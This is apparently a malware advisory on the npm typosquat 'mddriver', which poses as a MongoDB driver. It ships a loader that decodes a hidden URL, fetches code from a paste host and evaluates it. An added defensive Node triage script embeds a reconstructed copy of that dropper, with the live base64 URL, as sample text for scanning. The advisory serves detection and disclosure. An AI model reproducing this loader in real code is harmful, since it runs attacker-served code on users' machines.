MAL-2026-5791
Malicious code in mddriver (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5a5b264d05ffaf76e8be2d7a46cb2277211a045fa15e8c510ab60cdd5c5bae56)

On `require('mddriver')`, an IIFE in index.js invokes `loadTokenData()`, which fetches https://www.jsonkeeper.com/b/C4H0M (stored base64-encoded as "aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9DNEgwTQ==" and decoded with `atob`), parses the JSON response, and passes its `.content` field to a Function-constructor evaluator (`new (Function.constructor)(...)`) for execution.

The paste-style host is anonymous and the fetched content is fully mutable: any consumer that imports this package executes whatever JavaScript the operator of that paste serves at that moment, with no signature, hash, or pinning. The second stage therefore lives entirely off-package and can differ from one install to the next, so inspecting the published tarball tells you that a remote loader ran, not what it ran.

The package metadata advertises a 'MongoDB connection driver', but the shipped index.js is a verbatim copy of Node's built-in `path` module with the dropper appended; it provides no MongoDB functionality at all. The name 'mddriver' and the misleading description are consistent with a typosquat targeting developers searching for mongodb / mongoose drivers.
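As an added example (not the malicious package's code and not an Amazon Inspector tool), the Node script below statically triages a source file for the loader pattern described above (a quoted base64 literal that decodes to a URL, `atob`, `fetch`, and a Function-constructor evaluator) and walks a package-lock.json for a package name, including nested copies. The sample index.js body, the benign module and the lockfile are constructed to mirror the described behaviour; only the base64 literal and its decoded URL are taken from the advisory. The function names, the `INDICATORS` table and the verdict rules are this example's own heuristics, not a published signature.

```javascript
// Added example, not code from the mddriver package or from Amazon Inspector.
// Static triage for the "decode hidden URL, fetch it, eval the response"
// dropper pattern. Runs offline under Node: nothing here fetches or evaluates.

// Each indicator alone is common in benign code; the verdict needs them together.
const INDICATORS = [
  { id: "atob", re: /\batob\s*\(/ },
  { id: "fetch", re: /\bfetch\s*\(/ },
  // new Function(...), Function(...), and the Function.constructor alias that
  // dodges a naive grep for "new Function(".
  { id: "function-ctor", re: /\bFunction\s*\.\s*constructor\b|\bnew\s+Function\s*\(|\bFunction\s*\(/ },
];

// Long quoted base64 literals. Buffer's decoder is tolerant, so hex digests and
// random tokens also "decode"; the URL check in extractHiddenUrls filters them.
const BASE64_LITERAL = /["'`]([A-Za-z0-9+/]{16,}={0,2})["'`]/g;

function extractHiddenUrls(src) {
  const urls = [];
  for (const m of src.matchAll(BASE64_LITERAL)) {
    const decoded = Buffer.from(m[1], "base64").toString("utf8");
    if (/^https?:\/\/\S+$/.test(decoded)) urls.push({ literal: m[1], url: decoded });
  }
  return urls;
}

// Verdict rules (this example's own heuristic):
//   remote-code-loader  hidden URL + fetch + Function-constructor eval
//   review              some indicator present, look at it by hand
//   clean               nothing matched
function scanSource(src) {
  const hits = INDICATORS.filter((i) => i.re.test(src)).map((i) => i.id);
  const hiddenUrls = extractHiddenUrls(src);
  const loader = hiddenUrls.length > 0 && hits.includes("fetch") && hits.includes("function-ctor");
  const verdict = loader ? "remote-code-loader" : hits.length || hiddenUrls.length ? "review" : "clean";
  return { verdict, hits, hiddenUrls };
}

// Walk an npm lockfile (v2/v3 "packages" map, or the v1 "dependencies" tree)
// and return every install path of the named package, nested copies included.
function findPackageInLock(lock, name) {
  const found = [];
  for (const key of Object.keys(lock.packages || {})) {
    if (key === `node_modules/${name}` || key.endsWith(`/node_modules/${name}`)) found.push(key);
  }
  const walk = (deps, prefix) => {
    for (const [dep, info] of Object.entries(deps || {})) {
      const p = `${prefix}node_modules/${dep}`;
      if (dep === name) found.push(p);
      walk(info.dependencies, p + "/");
    }
  };
  if (!lock.packages) walk(lock.dependencies, "");
  return found;
}

// Constructed sample standing in for the dropper appended to index.js. The
// base64 literal is the one quoted in the advisory. This text is only scanned.
const SAMPLE_INDEX_JS = `
(function () {
  async function loadTokenData() {
    const u = atob("aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9DNEgwTQ==");
    const data = await (await fetch(u)).json();
    new (Function.constructor)(data.content)();
  }
  loadTokenData();
})();
`;

// Constructed benign module for contrast.
const BENIGN_INDEX_JS = `
const path = require("path");
module.exports = { resolveConfig: (p) => path.resolve(process.cwd(), p) };
`;

// Constructed package-lock.json (lockfileVersion 3). The version is a
// placeholder; the advisory lists no version.
const SAMPLE_LOCK = {
  name: "example-app",
  lockfileVersion: 3,
  packages: {
    "": { dependencies: { mddriver: "*" } },
    "node_modules/mddriver": { version: "0.0.0" },
  },
};

console.log(JSON.stringify(scanSource(SAMPLE_INDEX_JS), null, 2));
console.log("benign:", scanSource(BENIGN_INDEX_JS).verdict);
console.log("lockfile:", findPackageInLock(SAMPLE_LOCK, "mddriver"));
```

To use it on a real install, feed `scanSource` the contents of `node_modules/<pkg>/index.js` (and any file named in the package's `main` field) and `findPackageInLock` the parsed lockfile. The scanner is triage, not proof: a loader that hides its URL with something other than base64, or evaluates with `vm` or `eval`, will only reach "review" or "clean", and even a correct "remote-code-loader" hit tells you nothing about the second stage, which has to be treated as unknown attacker-controlled code.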
Affected packages
No fixed version has been published for mddriver (npm). Because the package is a typosquat that ships no MongoDB functionality, only the remote loader, there is no known-safe version to pin to: remove it from package.json and the lockfile, reinstall, and use the driver you actually intended (mongodb or mongoose). Any machine that installed and loaded this package has executed whatever the paste served at the time, which cannot be recovered from the package itself, so treat those hosts and the credentials on them as compromised.